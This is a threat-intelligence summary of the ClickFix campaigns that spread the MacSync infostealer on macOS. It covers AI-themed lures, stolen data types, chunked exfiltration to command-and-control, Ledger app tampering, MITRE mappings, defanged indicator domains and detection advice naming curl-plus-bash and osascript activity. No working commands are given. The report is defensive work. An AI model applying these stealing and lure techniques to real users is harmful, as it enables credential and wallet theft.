Executive Summary
Threat actors continue to refine the ClickFix technique — a pure social-engineering attack that tricks users into copying and pasting obfuscated terminal commands. What started as a Windows-focused tactic has now fully matured on macOS.
Sophos X-Ops tracked three distinct campaigns between November 2025 and February 2026 that deliver the MacSync information stealer. The latest February 2026 variant uses dynamic AppleScript payloads, in-memory execution, and a loader-as-a-service model for maximum evasion.
Delivery relies heavily on AI-themed lures (OpenAI Atlas browser, "how to clean up your Mac" ChatGPT threads) served via Google sponsored ads and legitimate hosting platforms (Cloudflare Pages, Squarespace, Tencent EdgeOne). Victims are typically developers and power users — exactly the demographic that already trusts curl | sh patterns.
No CVEs are involved. This is 100% user-interaction abuse.
Campaign Timeline & Lures
| Campaign | Timeframe | Lure Theme | Delivery Platform | Key Evolution |
|---|---|---|---|---|
| Campaign 1 | Nov 2025 | OpenAI Atlas browser | Google sponsored links → fake Google Sites | First macOS ClickFix wave |
| Campaign 2 | Dec 2025 | "Clean up your Mac" guides | Sponsored ChatGPT conversations → fake GitHub pages | Leverages legitimate OpenAI threads + real-time victim tracking |
| Campaign 3 | Feb 2026 | Apple site impersonation + dev tools | Cloudflare Pages, Squarespace, Tencent EdgeOne | Dynamic AppleScript + in-memory execution |
All campaigns impersonate legitimate macOS software or AI tools and use flattering language ("For experienced users…") to lower suspicion.
MacSync Infostealer Capabilities
MacSync is a classic credential and file stealer that has evolved across the three waves:
-
Data harvested:
- Chromium & Firefox browser profiles (cookies, autofill, history, logins, extensions)
- Safari cookies, autofill, and Notes
- macOS Keychain databases
- SSH keys, AWS credentials, Kubernetes tokens
- Desktop/Documents/Downloads files (especially crypto wallets, .key, .pem, .wallet)
- Telegram Desktop data
- Ledger Live / Ledger Wallet seed phrases (via app.asar patching + ad-hoc re-signing)
-
Exfiltration: Packages everything into
/tmp/osalogging.zipand uploads in 10 MB chunks via PUT requests to C2 with session IDs. ZIP is deleted post-upload. -
Persistence (Feb 2026 variant): Relaunches as background daemon + multistage shell loader.
Tactics, Techniques & Procedures (TTPs)
Core ClickFix flow (all campaigns):
- Victim lands on fake landing page (via sponsored ad or ChatGPT redirect).
- Page displays step-by-step Terminal instructions (Spotlight → Terminal → paste command).
- Command is a heavily obfuscated
curlthat downloads a Bash/shell script. - Script prompts for system password, downloads payload, and executes (often redirecting I/O to
/dev/null).
Additional TTPs observed:
- Use of legitimate platforms (ChatGPT shared conversations, Cloudflare Pages) to bypass reputation filters.
- Real-time victim tracking via
stats.phpendpoints and Telegram bots. - User-Agent fingerprinting + Cloudflare protection on C2.
- February variant: Base64 + Gzip compressed shell loaders, API-key-gated C2, dynamic AppleScript payloads executed in memory.
- Evidence removal during execution.
MITRE ATT&CK mappings (inferred from observed behavior):
| Tactic | Technique |
|---|---|
| TA0001 Initial Access | T1566 Phishing (malvertising + fake sites) |
| TA0002 Execution | T1059.004 Unix Shell, T1204.002 User Execution |
| TA0003 Persistence | T1543.004 Launch Daemon (Feb variant) |
| TA0005 Defense Evasion | T1027 Obfuscated Files or Information, T1140 Deobfuscate/Decode, T1564.001 Hidden Files |
| TA0006 Credential Access | T1555.001 Keychain, T1552.004 Credentials in Files |
| TA0010 Exfiltration | T1041 Exfiltration Over C2 Channel (chunked uploads) |
Indicators of Compromise (IOCs)
Malicious Domains (all observed inactive at time of reporting)
get-mactech[.]com
getmaclab[.]com
getmacnow[.]com
imaclife[.]com
insta-macer[.]com
instmac[.]com
mac-faster[.]com
mac-fast[.]com
mac-space[.]com
macfixnow[.]com
mymachub[.]com
mymacsoft[.]com
jmpbowl[.]top
jmpbowl[.]xyz
Key URLs / Patterns
http[s]://[campaign-domain]/?sid=[tracking-id]https://[campaign-domain]/app/https://[campaign-domain]/app/stats.php(victim tracking)http://jmpbowl[.](top|xyz)/curl/[SHA256-hash]
File Paths (on victim machines)
/tmp/osalogging.zip/Applications/Ledger Wallet.app(tampered)/Applications/Ledger Live.app(tampered)
Note: No file hashes were published in the public reports. All listed domains were registered between November and December 2025.
Detection & Mitigation Guidance
For organizations & individuals:
- Educate users: Never paste Terminal commands from untrusted web pages — even if the page looks legitimate.
- Monitor for unusual
curl+bashorosascriptexecutions. - Enable Gatekeeper and XProtect (they were bypassed in these campaigns via user password entry).
- Use macOS endpoint protection with behavioral detection for Terminal abuse.
- Block known malicious domains at the proxy level (list above).
- For developers: Prefer Homebrew / official installers over random web "quick install" guides.
Enterprise recommendations:
- Deploy Jamf or similar MDM to block unsigned binaries and monitor LaunchDaemons.
- Monitor for outbound connections to the listed domains and
/stats.phpendpoints.
Why This Matters
ClickFix/InstallFix is uniquely dangerous on macOS because the curl | sh pattern is a legitimate developer workflow (Homebrew, Rust, nvm, etc.). Threat actors are weaponizing trust in AI tools and ChatGPT at scale. With macOS market share growing in enterprise and the value of stolen SSH keys and crypto wallets, these campaigns will only accelerate.
The February 2026 variant's move to dynamic in-memory AppleScript shows the actors are actively iterating in response to detections.
Sources & Further Reading
- Sophos X-Ops: "Evil Evolution: ClickFix and macOS Infostealers" (March 2026)
- The Hacker News: "ClickFix Campaigns Spread MacSync macOS Infostealer via Fake AI Tool Installers" (March 16, 2026)